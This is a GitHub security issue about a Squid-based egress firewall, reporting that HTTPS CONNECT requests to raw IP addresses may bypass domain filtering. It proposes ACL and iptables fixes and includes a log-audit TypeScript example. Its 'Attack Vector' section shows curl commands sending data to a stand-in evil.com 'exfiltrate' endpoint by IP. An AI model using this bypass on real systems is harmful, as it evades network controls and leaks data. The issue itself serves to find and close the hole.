[Security] Direct IP + TLS connections may bypass domain filtering #137

@Mossaka

Description

Priority

P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

  • Only traffic to Squid (172.30.0.10) and DNS servers is allowed
  • All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

  1. Squid ACL: Explicit deny for non-domain CONNECT requests
  2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
# Note: this regex only matches dotted-quad IPv4 literals; bracketed IPv6
# targets such as CONNECT [2001:db8::1]:443 are not covered by it.
# http_access is first-match, so this deny must come before any
# http_access allow line for the permitted domains.
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

  • src/squid-config.ts - Add IP CONNECT deny rule
  • src/squid-config.test.ts - Test IP CONNECT is denied
  • Verification script for testing

Testing

  • Direct IP HTTPS is blocked
  • Domain-based HTTPS still works
  • Squid logs show IP CONNECT attempts as denied
  • Host iptables provides backup blocking
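As an added example that is not part of the awf project or of this issue, the following TypeScript mirrors the Option A ACL decision (deny a CONNECT whose target host is an IP literal) and audits Squid native-format access.log lines for IP-literal CONNECT attempts that were not denied, which is the check the "Squid logs show IP CONNECT attempts as denied" item above calls for. It goes beyond the dotted-quad regex in Option A by also treating bracketed IPv6 literals as IP targets. The function names and the sample log lines are constructed for this example.

```typescript
// Added example (not project code): classify CONNECT targets the way the
// proposed ACL would, and audit Squid access.log lines for IP-literal CONNECT
// attempts that were not denied. All sample data below is constructed.

const IPV4_LITERAL = /^\d{1,3}(?:\.\d{1,3}){3}$/;
// CONNECT targets carry IPv6 literals in brackets ("[2001:db8::1]:443");
// an IPv4-only regex does not catch these.
const IPV6_LITERAL = /^\[[0-9a-fA-F:.]+\]$/;

type TargetKind = "ipv4" | "ipv6" | "domain";

/** Split a CONNECT target "host:port" into host and port (handles bracketed IPv6). */
function splitConnectTarget(target: string): { host: string; port: number } {
  const idx = target.lastIndexOf(":");
  if (idx === -1) throw new Error(`CONNECT target without port: ${target}`);
  const host = target.slice(0, idx);
  const port = Number(target.slice(idx + 1));
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    throw new Error(`bad port in CONNECT target: ${target}`);
  }
  return { host, port };
}

function classifyHost(host: string): TargetKind {
  if (IPV4_LITERAL.test(host)) return "ipv4";
  if (IPV6_LITERAL.test(host)) return "ipv6";
  return "domain";
}

/** Mirrors the Option A policy: deny any CONNECT whose host is an IP literal. */
function shouldDenyConnect(target: string): boolean {
  return classifyHost(splitConnectTarget(target).host) !== "domain";
}

/** One parsed line of Squid's native access.log format. */
interface AccessEntry {
  client: string;
  result: string;   // e.g. TCP_DENIED, TCP_TUNNEL
  status: number;   // HTTP status Squid returned
  method: string;
  url: string;      // for CONNECT this is "host:port"
}

function parseAccessLine(line: string): AccessEntry | null {
  // native format: time elapsed client result/status bytes method url user hierarchy type
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  const [result, status] = f[3].split("/");
  return { client: f[2], result, status: Number(status), method: f[5], url: f[6] };
}

/** Return IP-literal CONNECT attempts that Squid did NOT deny (policy gaps). */
function findUndeniedIpConnects(lines: string[]): AccessEntry[] {
  const gaps: AccessEntry[] = [];
  for (const line of lines) {
    const e = parseAccessLine(line);
    if (!e || e.method !== "CONNECT") continue;
    if (!shouldDenyConnect(e.url)) continue;   // domain target: not in scope here
    if (e.result !== "TCP_DENIED") gaps.push(e);
  }
  return gaps;
}

// Constructed sample log: one allowed domain tunnel, two denied IP literals,
// and one IPv4 literal that was tunnelled (the case the ACL must close).
const SAMPLE_LOG: string[] = [
  "1700000000.101    12 172.30.0.5 TCP_TUNNEL/200 5120 CONNECT example.com:443 - HIER_DIRECT/93.184.216.34 -",
  "1700000000.205     0 172.30.0.5 TCP_DENIED/403 3900 CONNECT 93.184.216.34:443 - HIER_NONE/- text/html",
  "1700000000.310    15 172.30.0.5 TCP_TUNNEL/200 2048 CONNECT 140.82.114.4:443 - HIER_DIRECT/140.82.114.4 -",
  "1700000000.412     0 172.30.0.5 TCP_DENIED/403 3900 CONNECT [2606:4700::1111]:443 - HIER_NONE/- text/html",
];

for (const gap of findUndeniedIpConnects(SAMPLE_LOG)) {
  console.log(`IP-literal CONNECT not denied: ${gap.client} -> ${gap.url} (${gap.result}/${gap.status})`);
}
```

Running the audit over a real access.log (for example the file the verification script tails) should return an empty list once the ACL is in place; any entry it returns is a CONNECT to an IP literal that Squid tunnelled and that only the host iptables default deny could have stopped.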

Labels

bug (Something isn't working)
